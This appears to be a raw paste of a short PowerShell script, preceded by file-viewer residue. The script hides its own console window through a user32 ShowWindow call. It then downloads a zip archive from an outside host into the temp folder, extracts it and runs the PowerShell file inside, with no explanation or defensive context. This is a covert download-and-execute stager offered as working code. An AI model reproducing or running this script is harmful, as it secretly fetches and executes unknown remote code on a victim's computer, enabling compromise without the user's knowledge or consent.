5 lines
359 B
Text
5 lines
359 B
Text
$i = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);';
|
|
add-type -name win -member $i -namespace native;
|
|
[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);
|
|
|
|
cd "$env:tmp";irm -Uri 'https://jakoby.lol/qee' -O "rr.zip";Expand-Archive "rr.zip" -Force; .\rr.ps1
|